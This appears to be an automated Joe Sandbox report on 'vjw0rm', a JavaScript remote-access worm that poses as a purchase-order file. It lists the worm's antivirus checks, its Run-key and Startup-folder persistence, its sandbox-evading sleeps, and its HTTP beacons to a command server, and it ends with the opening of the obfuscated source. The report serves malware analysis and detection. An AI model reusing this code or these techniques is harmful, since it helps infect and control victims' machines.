Analysis Report

Overview

General Information

Joe Sandbox Version:	20.0
Analysis ID:	381804
Start time:	14:00:17
Joe Sandbox Product:	Cloud
Start date:	03.10.2017
Overall analysis duration:	0h 6m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	12PO #927476.js
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled VBA Instrumentation enabled JavaScript Instrumentation enabled
Detection:	MAL
Classification:	mal68.evad.troj.winJS@9/8@0/0
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
EGA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .js
Warnings:	Show All Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, WmiApSrv.exe, dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	68	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Signature Overview

Click to jump to signature section

AV Detection:

JavaScript source code contains functionality to check for AV products

Show sources

Source: 12PO #927476.js	Argument value : ['"AntiVirusProduct"']	Go to definition
Source: 12PO #927476.js	Return value : ['"AntiVirusProduct"']	Go to definition
Source: 12PO #927476.js	Argument value : ['"AntiVirusProduct"']	Go to definition

Software Vulnerabilities:

JavaScript source code contains functionality to generate code involving a shell, file or stream

Show sources

Source: 12PO #927476.js	Return value : ['"Shell.Application"', '"Scripting.FileSystemObject"', '"WScript.Shell"']	Go to definition
Source: 12PO #927476.js	Return value : ['"Shell.Application"', '"Scripting.FileSystemObject"', '"WScript.Shell"']	Go to definition
Source: 12PO #927476.js	Return value : ['"Shell.Application"', '"Scripting.FileSystemObject"', '"WScript.Shell"']	Go to definition
Source: 12PO #927476.js	Return value : ['"Shell.Application"', '"Scripting.FileSystemObject"', '"WScript.Shell"']	Go to definition

Networking:

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /Vre HTTP/1.1Accept: */*Accept-Language: en-USUser-Agent: vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE\Accept-Encoding: gzip, deflateHost: 63.141.242.245:7974Content-Length: 0Connection: Keep-AliveCache-Control: no-cache

Urls found in memory or binary data

Show sources

Source: wscript.exe	String found in binary or memory: http://63.141.242.245:7974/3
Source: wscript.exe	String found in binary or memory: http://63.141.242.245:7974/4y#
Source: wscript.exe	String found in binary or memory: http://63.141.242.245:7974/pr
Source: wscript.exe	String found in binary or memory: http://63.141.242.245:7974/vre
Source: wscript.exe	String found in binary or memory: http://63.141.242.245:7974/vre&
Source: wscript.exe	String found in binary or memory: http://63.141.242.245:7974/vre9
Source: wscript.exe	String found in binary or memory: http://63.141.242.245:7974/vre:
Source: wscript.exe	String found in binary or memory: http://63.141.242.245:7974/vret

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic

TCP traffic: 192.168.1.81:49163 -> 63.141.242.245:7974

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads

Show sources

Source: 12PO #927476.js	Argument value : ['"http://63.141.242.245:7974/Vre"', '"http://63.141.242.245:7974/","Vre"']	Go to definition
Source: 12PO #927476.js	Return value : ['"Microsoft.XMLHTTP"']	Go to definition
Source: 12PO #927476.js	Return value : ['"Microsoft.XMLHTTP"']	Go to definition
Source: 12PO #927476.js	Return value : ['"User-Agent:"', '"User-Agent:","vjw0rm_7C2D4D8F\\computer\\user\\Microsoft Windows 7 Professional \\undefined\\\\YES\\']	Go to definition
Source: 12PO #927476.js	Return value : ['"http://63.141.242.245:7974/Vre"', '"POST","http://63.141.242.245:7974/Vre",false', '"open"', '"http://63.141.242.245:7974/"', '"POST"', '"http://63.141.242.245:7974/","Vre"']	Go to definition
Source: 12PO #927476.js	Return value : ['"Microsoft.XMLHTTP"']	Go to definition
Source: 12PO #927476.js	Return value : ['"send"']	Go to definition
Source: 12PO #927476.js	Return value : ['"Microsoft.XMLHTTP"']	Go to definition

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 7974
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 7974
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 7974

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run JUHZ3GDTCR
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run JUHZ3GDTCR

Creates a start menu entry (Start Menu\Programs\Startup)

Show sources

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js

Stores files to the Windows start menu directory

Show sources

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js\:Zone.Identifier:$DATA

Drops script or batch files to the startup folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup)

Show sources

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js

Data Obfuscation:

JavaScript source code contains large arrays or strings with random content potentially encoding malicious code

Show sources

Source: 12PO #927476.js	String : entropy: 6.04, length: 262, content: '\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x5			Go to definition
Source: 12PO #927476.js	Array : entropy: 5.42, length: 133, content: '\x43\x33\x6e\x44\x69\x43\x68\x72\x4b\x48\x70\x56\x49\x63\x4b\x59''\x77\x70\x66\x44\x6a\x44\x7a\x44\			Go to definition

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft

System Summary:

Binary contains paths to debug symbols

Show sources

Source:	Binary string: wscript.pdb source: wscript.exe
Source:	Binary string: scrrun.pdb source: wscript.exe
Source:	Binary string: wscript.pdbN source: wscript.exe

Classification label

Show sources

Source: classification engine

Classification label: mal68.evad.troj.winJS@9/8@0/0

Creates files inside the user directory

Show sources

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js

Creates temporary files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user~1\AppData\Local\Temp\12PO #927476.js

Launches a second explorer.exe instance

Show sources

Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe

Reads ini files

Show sources

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\12PO #927476.js'
Source: unknown	Process created: C:\Windows\explorer.exe explorer.exe 'C:\Users\user~1\AppData\Local\Temp\12PO #927476.js'
Source: unknown	Process created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\12PO #927476.js'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\12PO #927476.js'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js'

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Java / VBScript file with very long strings (likely obfuscated code)

Show sources

Source: 12PO #927476.js

Initial sample: Strings found which are bigger than 50

Reads the hosts file

Show sources

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: wscript.exe	Binary or memory string: Progman
Source: wscript.exe	Binary or memory string: Program Manager
Source: wscript.exe	Binary or memory string: Shell_TrayWnd

Anti Debugging:

Checks for debuggers (devices)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Windows\WinSxS\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\wscript.exe

System information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

Enumerates the file system

Show sources

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\wscript.exe TID: 3412	Thread sleep time: -420000s >= -60s
Source: C:\Windows\explorer.exe TID: 3564	Thread sleep time: -60000s >= -60s
Source: C:\Windows\explorer.exe TID: 3592	Thread sleep time: -60000s >= -60s
Source: C:\Windows\explorer.exe TID: 3592	Thread sleep time: -60000s >= -60s
Source: C:\Windows\explorer.exe TID: 3608	Thread sleep time: -60000s >= -60s
Source: C:\Windows\explorer.exe TID: 3648	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3696	Thread sleep time: -1020000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3696	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3728	Thread sleep time: -840000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3728	Thread sleep time: -60000s >= -60s

JavaScript source code contains functionality to check for volume information

Show sources

Source: 12PO #927476.js

Return value : ['"volumeserialnumber"']

Go to definition

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 7974
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 7974
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 7974

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Show sources

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious

Simulations

Behavior and APIs

Time	Type	Description
14:01:04	API Interceptor	462x Sleep call for process: wscript.exe modified from: 60000ms to: 500ms
14:01:10	API Interceptor	5x Sleep call for process: explorer.exe modified from: 60000ms to: 500ms
14:01:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run JUHZ3GDTCR "C:\Users\user~1\AppData\Local\Temp\12PO #927476.js"
14:01:10	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshot

Startup

System is w7_1

wscript.exe (PID: 3376 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\12PO #927476.js' MD5: 979D74799EA6C8B8167869A68DF5204A)

explorer.exe (PID: 3492 cmdline: explorer.exe 'C:\Users\user~1\AppData\Local\Temp\12PO #927476.js' MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3552 cmdline: explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3568 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

wscript.exe (PID: 3624 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\12PO #927476.js' MD5: 979D74799EA6C8B8167869A68DF5204A)

explorer.exe (PID: 3616 cmdline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

wscript.exe (PID: 3656 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js' MD5: 979D74799EA6C8B8167869A68DF5204A)

cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\12PO #927476.js
File Type:	ASCII text, with very long lines
MD5:	DD9452BBDB57C3EE29344E0F5CF30288
SHA1:	91A22487138C8C79A6F8E6E6C221B9334F407C37
SHA-256:	C33BE66C270A7A31B9EFAAD7959169E517A241BCDA70C050D1D94C66E1C52D95
SHA-512:	D9E7895421B6CED87A1586A79B2AA2AAFA745F429A41BC80200D36AE655DAEF33F1CEC721FFBB871C8BD25952F96B6156C9FEB0E151EF93A5CDDCFA9970DAF55
Malicious:	true

C:\Users\user~1\AppData\Local\Temp\12PO #927476.js:Zone.Identifier
File Type:	ASCII text, with CRLF line terminators
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
File Type:	ASCII text, with very long lines
MD5:	DD9452BBDB57C3EE29344E0F5CF30288
SHA1:	91A22487138C8C79A6F8E6E6C221B9334F407C37
SHA-256:	C33BE66C270A7A31B9EFAAD7959169E517A241BCDA70C050D1D94C66E1C52D95
SHA-512:	D9E7895421B6CED87A1586A79B2AA2AAFA745F429A41BC80200D36AE655DAEF33F1CEC721FFBB871C8BD25952F96B6156C9FEB0E151EF93A5CDDCFA9970DAF55
Malicious:	true

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js:Zone.Identifier
File Type:	ASCII text, with CRLF line terminators
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

Static File Info

General
File type:	ASCII text, with very long lines, with no line terminators
TrID:	Java Script (9000/0) 81.82% Java Script embedded in Visual Basic Script (2000/0) 18.18%
File name:	12PO #927476.js
File size:	24848
MD5:	b5b90ef6266f34b0eb4f9d3a9878a21e
SHA1:	869139b0ee2c45322e08bee1f9563d42c27c7f9d
SHA256:	2f79664300ec1ff18e0c35e28ce3456386252cd9eec67999619043684a5c11d5
SHA512:	69b3b00ee1eef8c4e7a359c534a4e09bd0832c0735cf2b21d9655f9fa813827fda230c70fec65c8728c280030be861c56d2d0e6da1f0cff2727f0d042c20ac75
File Content Preview:	var _0xada0=['\x43\x33\x6e\x44\x69\x43\x68\x72\x4b\x48\x70\x56\x49\x63\x4b\x59','\x77\x70\x66\x44\x6a\x44\x7a\x44\x71\x38\x4b\x58\x44\x38\x4b\x65','\x77\x37\x78\x59\x77\x36\x7a\x44\x6c\x4d\x4f\x4e','\x51\x78\x6a\x43\x6e\x30\x6b\x3d','\x41\x73\x4b\x4a\x46\

File Icon

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Okt 3, 2017 14:01:02.756071091 MESZ	49163	7974	192.168.1.81	63.141.242.245
Okt 3, 2017 14:01:02.756133080 MESZ	7974	49163	63.141.242.245	192.168.1.81
Okt 3, 2017 14:01:02.756361961 MESZ	49163	7974	192.168.1.81	63.141.242.245
Okt 3, 2017 14:01:02.756937981 MESZ	49163	7974	192.168.1.81	63.141.242.245
Okt 3, 2017 14:01:02.756967068 MESZ	7974	49163	63.141.242.245	192.168.1.81
Okt 3, 2017 14:01:12.292473078 MESZ	49164	7974	192.168.1.81	63.141.242.245
Okt 3, 2017 14:01:12.292515993 MESZ	7974	49164	63.141.242.245	192.168.1.81
Okt 3, 2017 14:01:12.292649984 MESZ	49164	7974	192.168.1.81	63.141.242.245
Okt 3, 2017 14:01:12.293178082 MESZ	49164	7974	192.168.1.81	63.141.242.245
Okt 3, 2017 14:01:12.293194056 MESZ	7974	49164	63.141.242.245	192.168.1.81
Okt 3, 2017 14:01:12.587258101 MESZ	49165	7974	192.168.1.81	63.141.242.245
Okt 3, 2017 14:01:12.587291956 MESZ	7974	49165	63.141.242.245	192.168.1.81
Okt 3, 2017 14:01:12.587594032 MESZ	49165	7974	192.168.1.81	63.141.242.245
Okt 3, 2017 14:01:12.588093996 MESZ	49165	7974	192.168.1.81	63.141.242.245
Okt 3, 2017 14:01:12.588109970 MESZ	7974	49165	63.141.242.245	192.168.1.81
Okt 3, 2017 14:03:07.108412981 MESZ	7974	49163	63.141.242.245	192.168.1.81
Okt 3, 2017 14:03:07.108556986 MESZ	49163	7974	192.168.1.81	63.141.242.245
Okt 3, 2017 14:03:07.108700991 MESZ	49163	7974	192.168.1.81	63.141.242.245
Okt 3, 2017 14:03:07.108722925 MESZ	7974	49163	63.141.242.245	192.168.1.81

HTTP Request Dependency Graph

63.141.242.245:7974

HTTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header	Total Bytes Transfered (KB)
Okt 3, 2017 14:01:02.756937981 MESZ	49163	7974	192.168.1.81	63.141.242.245	POST /Vre HTTP/1.1 Accept: / Accept-Language: en-US User-Agent: vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: 63.141.242.245:7974 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache	0
Okt 3, 2017 14:01:12.293178082 MESZ	49164	7974	192.168.1.81	63.141.242.245	POST /Vre HTTP/1.1 Accept: / Accept-Language: en-US User-Agent: vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: 63.141.242.245:7974 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache	1
Okt 3, 2017 14:01:12.588093996 MESZ	49165	7974	192.168.1.81	63.141.242.245	POST /Vre HTTP/1.1 Accept: / Accept-Language: en-US User-Agent: vjw0rm_7C2D4D8F\computer\user\Microsoft Windows 7 Professional \undefined\\YES\FALSE\ Accept-Encoding: gzip, deflate Host: 63.141.242.245:7974 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache	1

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 3376 Parent PID: 3000

General

Start time:	14:01:04
Start date:	03/10/2017
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\12PO #927476.js'
Imagebase:	0x76f30000
File size:	141824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 3492 Parent PID: 2920

General

Start time:	14:01:10
Start date:	03/10/2017
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe 'C:\Users\user~1\AppData\Local\Temp\12PO #927476.js'
Imagebase:	0x72f30000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 3552 Parent PID: 2920

General

Start time:	14:01:10
Start date:	03/10/2017
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js
Imagebase:	0x76f30000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 3568 Parent PID: 516

General

Start time:	14:01:10
Start date:	03/10/2017
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x76f30000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 3616 Parent PID: 516

General

Start time:	14:01:11
Start date:	03/10/2017
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x76f30000
File size:	2972672 bytes
MD5 hash:	6DDCA324434FFA506CF7DC4E51DB7935
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: wscript.exe PID: 3624 Parent PID: 3568

General

Start time:	14:01:11
Start date:	03/10/2017
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\12PO #927476.js'
Imagebase:	0x74e20000
File size:	141824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: wscript.exe PID: 3656 Parent PID: 3616

General

Start time:	14:01:11
Start date:	03/10/2017
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\12PO #927476.js'
Imagebase:	0x73c40000
File size:	141824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

JavaScript Code

Call Graph

Executed
Not Executed

Script:

Code
0	var _0xada0 = [ '\x43\x33\x6e\x44\x69\x43\x68\x72\x4b\x48\x70\x56\x49\x63\x4b\x59', '\x77\x70\x66\x44\x6a\x44\x7a\x44\x71\x38\x4b\x58\x44\x38\x4b\x65', '\x77\x37\x78\x59\x77\x36\x7a\x44\x6c\x4d\x4f\x4e', '\x51\x78\x6a\x43\x6e\x30\x6b\x3d', '\x41\x73\x4b\x4a\x46\x6b\x6a\x44\x70\x73\x4b\x67\x4c\x51\x30\x3d', '\x77\x70\x68\x37\x48\x58\x67\x38\x45\x79\x33\x43\x75\x67\x3d\x3d', '\x56\x6a\x4e\x6a', '\x57\x38\x4b\x44\x77\x34\x44\x44\x68\x73\x4f\x4d', '\x5a\x4d\x4b\x62\x77\x6f\x72\x44\x76\x51\x3d\x3d', '\x77\x70\x5a\x53\x77\x35\x4a\x6d\x77\x71\x67\x3d', '\x77\x70\x4a\x30\x77\x34\x67\x3d', '\x64\x73\x4b\x43\x77\x6f\x7a\x44\x75\x67\x73\x3d', '\x4c\x48\x2f\x44\x6c\x7a\x45\x3d', '\x57\x6e\x2f\x44\x71\x63\x4f\x47\x77\x36\x51\x3d', '\x41\x63\x4b\x5a\x47\x47\x73\x3d', '\x77\x72\x6a\x44\x70\x63\x4f\x54', '\x77\x6f\x56\x75\x48\x30\x45\x61\x48\x79\x48\x43\x71\x38\x4b\x37\x59\x73\x4b\x31\x49\x51\x3d\x3d', '\x77\x72\x4a\x6b\x77\x34\x66\x44\x73\x33\x62\x43\x6a\x4d\x4b\x2b', '\x77\x72\x52\x51\x4b\x63\x4b\x6d\x4d\x41\x3d\x3d', '\x77\x6f\x52\x4d\x4b\x73\x4b\x38\x49\x51\x3d\x3d', '\x77\x6f\x72\x43\x74\x38\x4f\x66\x65\x63\x4f\x4a\x77\x6f\x6e\x44\x76\x51\x3d\x3d', '\x42\x38\x4b\x65\x47\x47\x76\x44\x73\x51\x3d\x3d', '\x61\x38\x4b\x66\x77\x34\x50\x44\x6e\x4d\x4f\x64', '\x59\x4d\x4f\x49\x77\x6f\x44\x43\x6c\x63\x4f\x63\x77\x37\x67\x57\x77\x71\x62\x44\x6c\x6e\x5a\x4e\x58\x67\x3d\x3d', '\x4e\x54\x30\x77\x4f\x4d\x4f\x6e\x64\x63\x4b\x30\x41\x52\x45\x4b\x77\x70\x31\x79\x4a\x6c\x4d\x67', '\x4b\x32\x72\x44\x6c\x69\x68\x76', 